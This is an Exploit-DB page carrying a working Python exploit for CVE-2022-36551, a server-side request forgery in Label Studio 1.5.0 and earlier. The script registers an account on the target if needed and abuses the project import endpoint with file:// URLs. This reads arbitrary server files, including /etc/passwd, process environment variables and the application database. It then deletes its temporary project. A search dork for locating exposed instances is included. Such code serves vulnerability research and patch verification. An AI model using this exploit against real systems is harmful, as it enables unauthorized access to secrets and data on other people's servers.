Label Studio 1.5.0 – Authenticated Server Side Request Forgery (SSRF)

  • 作者: Ryan Smith
    日期: 2023-03-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51109/
  • # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
    # Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
    # Date: 2022-10-03
    # Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
    # Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
    # Software Link: https://github.com/heartexlabs/label-studio/releases
    # Version: <=1.5.0
    # CVE : CVE-2022-36551
    # Docker Container: heartexlabs/label-studio
    
    # Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition 
    # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. 
    # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote 
    # attacker to create a new account and then exploit the SSRF.
    
    #
    # This exploit has been tested on Label Studio 1.5.0
    #
    
    # Exploit Usage Examples (replace with your target details):
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
    
    
    import json
    import argparse
    import requests
    import shutil
    from urllib.parse import urljoin
    from urllib.parse import urlparse
    requests.packages.urllib3.disable_warnings() 
    
    # main function for exploit
    def main(url, filePath, writePath, username, password, shouldRegister):
    # check if the URL is reachable
    try:
    r = requests.get(url, verify=False)
    if r.status_code == 200:
    print("[+] URL is reachable")
    else:
    print("[!] Error: URL is not reachable, check the URL and try again")
    exit(1)
    
    except requests.exceptions.RequestException as e:
    print("[!] Error: URL is not reachable, check the URL and try again")
    exit(1)
    
    session = requests.Session()
    
    login(session, url, username, password, shouldRegister)
    print("[+] Logged in")
    print("[+] Creating project...")
    
    # Create a temp project
    projectDetails = create_project(session, url)
    print("[+] Project created, ID: {}".format(projectDetails["id"]))
    
    #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
    print("[+] Attempting to fetch: {}".format(filePath))
    fetch_file(session, url, projectDetails["id"], filePath, writePath)
    
    print("[+] Deleting Project.. {}".format(projectDetails["id"]))
    delete_project(session, url, projectDetails["id"])
    print("[+] Project Deleted")
    
    print("[*] Finished executing exploit")
    
    
    # login, logs the user in
    def login(session, url, username, password, shouldRegister):
    
    # hit the main page first to get the CSRF token set
    r = session.get(url, verify=False)
    
    r = session.post(
    urljoin(url, "/user/login"),
    data={
    "email": username,
    "password": password,
    "csrfmiddlewaretoken": session.cookies["csrftoken"],
    },
    verify=False
    )
    
    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
    return
    elif r.text.find("The email and password you entered") > 0 and shouldRegister:
    
    print("[!] Account does not exist, registering...")
    r = session.post(
    urljoin(url, "/user/signup/"),
    data={
    "email": username,
    "password": password,
    "csrfmiddlewaretoken": session.cookies["csrftoken"],
    'allow_newsletters': False,
    },
    )
    if r.status_code == 302:
    # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
    return
    
    else:
    print("[!] Error: Could not login, check the credentials and try again")
    exit(1)
    
    
    # create_project creates a temporary project for exploiting the SSRF
    def create_project(session, url):
    
    
    
    r = session.post(
    urljoin(url, "/api/projects"),
    data={
    "title": "TPS Report Finder",
    },
    verify=False
    )
    
    if r.status_code == 200 or r.status_code == 201:
    return r.json()
    else:
    print("[!] Error: Could not create project, check your credentials / permissions")
    exit(1)
    
    def fetch_file(session, url, projectId, filePath, writePath):
    
    # if scheme is empty prepend file://
    parsedFilePath = urlparse(filePath)
    
    if parsedFilePath.scheme == "":
    filePath = "file://" + filePath
    
    headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    url = urljoin(url, "/api/projects/{}/import".format(projectId))
    r = session.post(url,
    data={
    "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
    },
    headers=headers, 
    verify=False
    )
    
    if r.status_code == 201:
    # file found! -- first grab the file path details
    fileId = r.json()["file_upload_ids"][0]
    r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
    r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
    print("[+] File found!")
    
    # if user wants to write to disk, make it so
    if writePath != None:
    print("[+] Writing to {}".format(writePath))
    # write the file to disk
    with open(writePath, 'wb') as handle:
    shutil.copyfileobj(r.raw, handle)
    handle.close()
    return
    else:
    print("==========================================================")
    print(r.text)
    print("==========================================================")
    return
    else:
    print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
    print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
    return
    
    
    def delete_project(session, url, projectId):
    
    url = urljoin(url, "/api/projects/{}".format(projectId))
    r = session.delete(url, verify=False)
    if r.status_code == 200 or r.status_code == 204:
    return
    else:
    print( "[!] Error: Could not delete project, check your credentials / permissions")
    exit(1)
    
    parser = argparse.ArgumentParser()
    
    parser.add_argument("--url", required=True, help="Label Studio URL")
    parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
    parser.add_argument("--out", required=False, help="Path to write the file.If omitted will be written to STDOUT")
    parser.add_argument("--username", required=False, help="Username for existing account (email)")
    parser.add_argument("--password", required=False, help="Password for existing account")
    parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
    )
    
    args = parser.parse_args()
    main(args.url, args.file, args.out, args.username, args.password, args.register)